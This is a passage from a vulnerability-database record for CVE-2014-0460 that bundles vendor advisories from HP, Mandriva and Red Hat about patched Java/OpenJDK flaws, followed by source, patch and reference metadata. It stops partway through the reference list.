v7.0 update to Java v7.0.10 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk70.JDK70-COM\nJdk70.JDK70-DEMO\nJdk70.JDK70-IPF32\nJdk70.JDK70-IPF64\nJre70.JRE70-COM\nJre70.JRE70-IPF32\nJre70.JRE70-IPF32-HS\nJre70.JRE70-IPF64\nJre70.JRE70-IPF64-HS\naction: install revision 1.7.0.10.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 19 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n \n Note that the CVE-2014-0459 issue is in the lcms2 library, which has\n been patched to correct this flaw. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdfckmqjQ0CJFipgRArKEAKCIiAR2WkLo3Vb0gzzQ5RDz7hQZ3gCcDC6A\n5xOtKkhOvonpLXoqBiAcXWQ=\n=qBk5\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: java-1.6.0-openjdk security and bug fix update\nAdvisory ID: RHSA-2014:0408-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0408.html\nIssue date: 2014-04-16\nCVE Names: CVE-2014-0429 CVE-2014-0446 CVE-2014-0451 \n CVE-2014-0452 CVE-2014-0453 CVE-2014-0456 \n CVE-2014-0457 CVE-2014-0458 CVE-2014-0460 \n CVE-2014-0461 CVE-2014-1876 CVE-2014-2397 \n CVE-2014-2398 CVE-2014-2403 CVE-2014-2412 \n CVE-2014-2414 CVE-2014-2421 CVE-2014-2423 \n CVE-2014-2427 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.6.0-openjdk packages that fix various security issues and\none bug are now available for Red Hat Enterprise Linux 5 and 6. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit. \n\nAn input validation flaw was discovered in the medialib library in the 2D\ncomponent. A specially crafted image could trigger Java Virtual Machine\nmemory corruption when processed. A remote attacker, or an untrusted Java\napplication or applet, could possibly use this flaw to execute arbitrary\ncode with the privileges of the user running the Java Virtual Machine. \n(CVE-2014-0429)\n\nMultiple flaws were discovered in the Hotspot and 2D components in OpenJDK. \nAn untrusted Java application or applet could use these flaws to trigger\nJava Virtual Machine memory corruption and possibly bypass Java sandbox\nrestrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)\n\nMultiple improper permission check issues were discovered in the Libraries\ncomponent in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2014-0457,\nCVE-2014-0461)\n\nMultiple improper permission check issues were discovered in the AWT,\nJAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass certain Java sandbox\nrestrictions. (CVE-2014-2412, CVE-2014-0451, CVE-2014-0458, CVE-2014-2423,\nCVE-2014-0452, CVE-2014-2414, CVE-2014-0446, CVE-2014-2427)\n\nMultiple flaws were identified in the Java Naming and Directory Interface\n(JNDI) DNS client. These flaws could make it easier for a remote attacker\nto perform DNS spoofing attacks. (CVE-2014-0460)\n\nIt was discovered that the JAXP component did not properly prevent access\nto arbitrary files when a SecurityManager was present. This flaw could\ncause a Java application using JAXP to leak sensitive information, or\naffect application availability. (CVE-2014-2403)\n\nIt was discovered that the Security component in OpenJDK could leak some\ntiming information when performing PKCS#1 unpadding. This could possibly\nlead to the disclosure of some information that was meant to be protected\nby encryption. (CVE-2014-0453)\n\nIt was discovered that the fix for CVE-2013-5797 did not properly resolve\ninput sanitization flaws in javadoc. When javadoc documentation was\ngenerated from an untrusted Java source code and hosted on a domain not\ncontrolled by the code author, these issues could make it easier to perform\ncross-site scripting (XSS) attacks. (CVE-2014-2398)\n\nAn insecure temporary file use flaw was found in the way the unpack200\nutility created log files. A local attacker could possibly use this flaw to\nperform a symbolic link attack and overwrite arbitrary files with the\nprivileges of the user running unpack200. (CVE-2014-1876)\n\nThis update also fixes the following bug:\n\n* The OpenJDK update to IcedTea version 1.13 introduced a regression\nrelated to the handling of the jdk_version_info variable. This variable was\nnot properly zeroed out before being passed to the Java Virtual Machine,\nresulting in a memory leak in the java.lang.ref.Finalizer class. \nThis update fixes this issue, and memory leaks no longer occur. \n(BZ#1085373)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618)\n1085373 - java.lang.ref.Finalizer leak when upgrading from 1.62 to 1.66\n1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736)\n1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766)\n1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841)\n1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394)\n1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858)\n1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854)\n1087423 - CVE-2014-2397 OpenJDK: classfile parser invalid BootstrapMethods attribute length (Hotspot, 8034926)\n1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794)\n1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010)\n1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797)\n1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152)\n1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030)\n1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188)\n1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801)\n1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740)\n1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163)\n1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731)\n1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0429.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0446.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0451.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0452.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0453.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0456.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0457.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0458.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0460.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0461.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1876.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2397.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2398.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2403.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2414.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2421.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2423.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2427.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTTm2zXlSAg2UNWIIRAkZ8AJ4tQFSY3KSdfOiDJA5KJWO9IJa1BACeMLJ6\nPQHHIgiQ5K7Q4/GEJAHNU94=\n=9aj6\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2014-0460" }, { "db": "BID", "id": "66916" }, { "db": "VULHUB", "id": "VHN-67953" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" } ], "trust": 2.07 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0460", "trust": 2.9 }, { "db": "BID", "id": "66916", "trust": 2.0 }, { "db": "SECUNIA", "id": "58415", "trust": 1.7 }, { "db": "SECUNIA", "id": "59307", "trust": 1.7 }, { "db": "SECUNIA", "id": "60117", "trust": 1.7 }, { "db": "SECUNIA", "id": "59082", "trust": 1.7 }, { "db": "SECUNIA", "id": "59255", "trust": 1.7 }, { "db": "SECUNIA", "id": "59706", "trust": 1.7 }, { "db": "SECUNIA", "id": "59071", "trust": 1.7 }, { "db": "SECUNIA", "id": "59642", "trust": 1.7 }, { "db": "SECUNIA", "id": "59250", "trust": 1.7 }, { "db": "SECUNIA", "id": "61264", "trust": 1.7 }, { "db": "SECUNIA", "id": "59023", "trust": 1.7 }, { "db": "SECUNIA", "id": "59704", "trust": 1.7 }, { "db": "SECUNIA", "id": "59058", "trust": 1.7 }, { "db": "SECUNIA", "id": "59022", "trust": 1.7 }, { "db": "SECUNIA", "id": "59516", "trust": 1.7 }, { "db": "SECUNIA", "id": "60003", "trust": 1.7 }, { "db": "SECUNIA", "id": "59436", "trust": 1.7 }, { "db": "SECUNIA", "id": "59705", "trust": 1.7 }, { "db": "SECUNIA", "id": "60111", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10698", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201404-275", "trust": 0.7 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "HITACHI", "id": "HS14-009", "trust": 0.3 }, { "db": "VULHUB", "id": "VHN-67953", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126611", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126182", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130400", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127655", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127938", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126664", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127939", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126630", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126183", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-67953" }, { "db": "BID", "id": "66916" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "id": "VAR-201404-0381", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-67953" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:52:24.783000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "jdk-7u55-nb-8-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49309" }, { "title": "jre-7u55-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49313" }, { "title": "jdk-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49317" }, { "title": "jre-7u55-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49312" }, { "title": "jdk-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49316" }, { "title": "jre-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49320" }, { "title": "jdk-7u55-nb-8-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49311" }, { "title": "jdk-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49315" }, { "title": "jre-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49319" }, { "title": "jdk-7u55-nb-8-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49310" }, { "title": "jre-7u55-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49314" }, { "title": "jre-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49318" } ], "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-275" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0460" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672080" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674539" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676315" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677294" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681256" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683484" }, { "trust": 2.0, "url": "http://rhn.redhat.com/errata/rhsa-2014-0675.html" }, { "trust": 2.0, "url": "http://rhn.redhat.com/errata/rhsa-2014-0685.html" }, { "trust": 1.8, "url": "http://security.gentoo.org/glsa/glsa-201502-12.xml" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/66916" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673836" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676672" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676746" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679713" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681018" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686717" }, { "trust": 1.7, "url": 